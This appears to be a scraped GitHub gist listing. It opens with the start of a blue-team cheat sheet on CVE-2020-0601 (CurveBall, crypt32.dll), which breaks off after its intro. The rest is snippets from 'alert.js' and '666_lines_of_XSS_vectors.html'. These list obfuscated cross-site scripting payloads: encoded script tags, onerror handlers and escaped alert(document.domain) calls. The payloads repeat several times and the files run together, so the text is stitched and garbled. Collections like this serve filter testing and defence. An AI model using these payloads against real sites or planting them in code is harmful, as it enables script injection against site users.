Shoui a05110511t

## 20200114-TLP-WHITE_CVE-2020-0601.md

      
              1 file
            
          
              22 forks
            
          
              25 comments
            
          
              93 stars
            
          
                SwitHak
                / 20200114-TLP-WHITE_CVE-2020-0601.md
            
            
              Last active
              February 9, 2024 14:42
            
              
                BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC
              
          
    CVE-2020-0601 AKA ChainOfFools OR CurveBall

General


Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference,  followed by a blog post and an official security advisory.
The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation


NSA description:
NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.


## alert.js
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:

// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);

## 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

## 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
	// How many ways can you alert(document.domain)?
	// Comment with more ways and I'll add them :)
	// I already know about the JSFuck way, but it's too long to add (:

	// Direct invocation
	alert(document.domain);
	(alert)(document.domain);
	al\u0065rt(document.domain);
	al\u{65}rt(document.domain);
	window['alert'](document.domain);
	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>